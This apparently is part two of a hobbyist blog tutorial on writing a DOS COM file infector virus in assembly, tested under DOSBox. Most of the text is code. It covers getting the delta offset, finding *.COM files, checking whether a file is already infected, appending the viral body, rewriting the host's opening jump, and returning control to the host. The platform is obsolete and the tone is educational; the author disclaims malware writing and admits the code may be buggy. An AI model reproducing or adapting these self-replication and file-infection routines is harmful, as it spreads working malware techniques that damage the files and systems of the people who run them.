In the previous tutorial we looked at the basics of writing a COM infector and the different interrupts for writing to the screen in DOS. If you missed part one take a moment to go back and read it! In part two we’ll be diving into the actual virus body itself.
Hacking the Gibson.
Before we can continue we need to solve a very old problem faced by malware authors: “how to access variables if my code is running at an unknown offset?”. In a normal program we can simply access our data like so:
szString db "Our string",0,"$" mov ah, 9 ; Request write to screen mov dx, offset szString ; Our string offset int 21h ; Execute
However our virus is not running from 100h like a normal program, as it is appended to the end of our host program. Any attempts to access variables in this manner will cause a system crash. Best case scenario the program will crash back to command.com worst case scenario: the entire system will hang.
In order to avoid this issue we need to employ something known as the Delta Offset trick. How it works is quite simple: at run-time we simply make a call to a label at our current position. When you call an instruction the return address is pushed onto the stack, then we can simply pop this value off the stack and subtract the offset of the label from the absolute address.
Here’s what it looks like in code (as a macro):
@GetDeltaOffset MACRO Reg LOCAL GetIPCall call GetIPCall GetIPCall: pop Reg sub Reg, offset GetIPCall ENDM
And here’s how to call it:
@GetDeltaOffset bp ; The BP register now contains our offset
Now when we want to reference our variables we can do so using BP:
mov cx, 1 ; Print with CRLF lea si, [bp+szString] ; Now we can correctly locate our vars call Printf ; Our print function from the previous tutorial
Finding some friends to play with
We can’t do anything fun unless we can find some files to mess with. So we’re going to have look into our interrupts documentation and see how to access the file system.
Find First File looks like a winner. It takes two parameters the file attribute and an ASCII Zero string for a search parameter. Before calling this function we need to save the pointer to the system’s Data Transfer Area (DTA). Failing to do this will result the loss of the program command tail (that’s bad).
OldDTA dw 2 dup(?) ; Pointer to old DTA NewDTA db 2bh dup(?) ; Our allocated memory for new DTA (43 bytes) mov ah, 2fh int 21h ; Get current DTA mov word ptr [bp+OldDTA], es ; Store old address mov word ptr [bp+OldDTA+2], bx ; ; Now we have the old DTA we can set our new one mov ah, 1ah lea dx, [bp+NewDTA] ; Our DTA buffer int 21h ; Set DTA
Now we can finally call our find function to locate our target!
szTarget db "*.COM",0 mov ah,4eh ; Find first matching file mov cx,20h ; Attribute lea dx,[bp+szTarget] int 21h jc EXIT ; If the carry flag is set the call failed mov cx, 1 lea si, dword ptr [bp+OldDTA+1eh+4h] ; Pointer to filename call Printf ; Print to screen
The Infection Routine
Now we’ve located a file we can insert our viral payload into it. Previously I talked about how COM files typically have either a NEAR JMP (EB XX) or a FAR JMP (E9 XX XX) at the start of the file. We’re going to write our code to the end of the file then update this JMP instruction with the address of our entry point.
But before we can do that we need to check two things:
- We’ve actually found a valid COM File (sometimes EXE files are renamed to COM files).
- We haven’t infected this file previously.
So first we read some data from the file:
hFile dw ? ; File handle OldHeader db 5 dup(?) ; Buffer for data mov ax, 3d02h lea dx, [bp+NewDTA+1eh] ; Pointer to our filename int 21h ; Open file jc FAIL ; We were unable to open the file ; ax now contains our file handle mov bp+hFile, ax xor ax, ax mov ah, 3fh ; Read file mov bx, bp+hFile ; File Handle mov cx, 5h ; Bytes to read lea dx, bp+OldHeader ; Buffer to read into int 21h cmp al, 5h ; Did we get all the data? jl FAIL ; Read failed, exit
Now we need to check for the PE signature:
xchg di, dx ; Swap data between di, dx mov ax, 5a4dh ; Check for MZ signature (M -> 4Dh, Z -> 5Ah) cmp ax, [di] je FAIL ; File is a EXE
Check for our infection marker. Since we’re using a FAR JMP instruction we cannot use the first 3 bytes of the program so we’ll write our marker to the 4th byte. This may cause some minor corruption to the host program but every COM file I tested continued to run normally. There are better ways to do this however this was the most common method of the day.
The rationale for this may have been that disk cycles were expensive. Reading from the start of the file would be significantly faster than reading from the end (especially on a floppy disk). So this may have been why malware authors at the time opted for this quicker (albeit more destructive) method.
VirusSignature db 't' xor ax, ax ; Zero register mov al, byte ptr [bp+VirusSignature] ; Move signature to AL cmp al, byte ptr [di+3] ; Zero index (4th byte) je FAIL ; File is already infected
Adding our payload
Now that all the safety checks are completed we can append our code.
mov ax, 4202h ; Move pointer to end of file mov bx, bp+hFile ; File handle xor cx, cx ; Zero registers xor dx, dx int 21h jc CLOSE_FILE ; If it failed close the file
Now we need to calculate our new JMP and place our infection marker:
NewJmp db 0E9h,0,0,0 ; Continuing from file open ; ax is our offset sub ax, 3 mov word ptr[bp+NewJmp+1h], ax ; Append our infection marker mov al, byte ptr [bp+VirusSignature] mov byte ptr [bp+NewJmp+3h], al ; Append virus code mov ah, 40h mov bx, bp+hFile lea dx, bp+START mov cx, offset END_OF_CODE - offset START int 21h jc CLOSE_FILE ; Failed jump to close file mov ax, 4200h ; Goto begining of file mov bx, bp+hFile xor cx, cx xor dx, dx int 21h jc CLOSE_FILE ; Failed jump to close file mov ah, 40h mov bx, bp+hFile ; File handle lea dx, bp+NewJmp ; JMP instruction mov cx, 4h ; Num bytes to write int 21h ; Write to file jmp CLOSE_FILE
Once we’re done we can close the file and continue:
CLOSE_FILE: mov ah, 3eh ; Close file mov bx, bp+hFile ; File Handle int 21h
You’re probably wondering about the offsets used in the size calculation. It’s quite simple you just need to design your skeleton program like so:
CODE_SEG SEGMENT ASSUME CS:CODE_SEG ORG 100H START: jmp MAIN MAIN: ; Virus start EXIT: mov ah, 4ch int 21h END_OF_CODE: CODE_SEG ENDS END START
Make sense? Good.
Returning control to host
At the moment our virus is almost complete we just need to do one more thing: return control to the host. The typical DOS way is to call int 20h however this doesn’t work as expected under DOSBox (or I couldn’t get it work anyhow). So I ended up coding my own solution to the problem.
When we jump to EXIT we can check the BP register (BP is holding our Delta Offset). If BP is greater than zero our code is running inside a host program, if it’s zero we’re a normal program and we can exit normally.
So we can add a little check on our exit label:
cmp bp, 0h jne EXIT_HOST ; We're inside a host program ; Otherwise quit normally mov ah, 4ch int 21h
Now for my creative method of exiting and returning control: scanning for an entry point. When I was picking apart COM files I noticed that the jump at the start of the program always landed on the same four bytes. Now this may not be the case for every COM file, but lacking any detailed documentation or a large number of COM files to test with it seemed pretty safe.
; We're searching for these bytes ; 0A 24 B4 09 ; Set loop counter max mov cx, 100h ; Set counter to 1 mov bx, 1 l1: ; Move the first two bytes + bx into ax ; Remember our program is loaded into 100h mov ax, word ptr cs:[100h + bx] ; Compare with 0A 24 cmp ax, 240ah ; Not found continue jne fail ; First match succeeded ; Check next pair mov ax, word ptr cs:[100h + bx + 2h] ; Compare with B4 09 cmp ax, 09b4h ; Found both? Jump to end je found fail: ; Increment the counter inc bx ; Check against loop max cmp bx, cx jl l1 found: ; Move offset into ax mov ax, bx ; Adjust pointer by one dec ax ; Update the jump at the start of our program mov word ptr cs:[101h], ax ; Set ax to equal program start mov ax, 100h ; Also don't forget to restore the original DTA ; Remember to return registers to ; their original values before jumping back ; Since we change the value in memory ; When we jump to 100h, now we'll jump to the ; Original program start jmp ax
So simply put we scan our program’s memory from the start looking for 0A 24 B4 09 which indicates an entry point. Once we’ve found it we update our jump in memory to point to the new address (original program start) then we jump back to the start of the file.
If we did this correctly once our program is done the original program will execute like nothing happened. You just need to make sure you return the registers to their original state before jumping back or weirdness may occur.
In conclusion that’s one way you can write a DOS COM Infector. Some things to note:
- You’ve probably noticed in the picture above that the ‘t’ has been replaced with ‘z’. I was using ‘z’ as my infection marker and it overwrite the first letter of my string in my test program.
- A better method would be to store some type of string inside the virus payload and scan for that since we don’t have a performance penalty in DOSBox.
- I am not an expert at assembler and do not claim to an expert at DOS. There’s probably some bugs in my code or it’s lacking in places. This is fine this was just a fun experiment for me.
- My entry point scan method is a hack to work on DOSBox. I wanted to get some of the ‘classic’ methods to work but wasn’t able to. I’m not sure if this is due to DOSBox itself or my lack of knowledge on the subject.
- I had intended to write a Terminate Stay Resident virus but I simply ran out of time.
- Finally DO NOT contact me asking for help on writing malware. I’m not interested and I think malware authors should be shot on sight.
I had a lot of fun learning and writing this it was a great time. I’ve never been so frustrated and captivated with project quite like this. It’s also made me fall in love with programming in assembler again (there’s something liberating about throwing away a big clunky IDE and just having a terminal and some man pages open).
I plan to return to DOSBox in the future for more shenanigans but that’s it for now.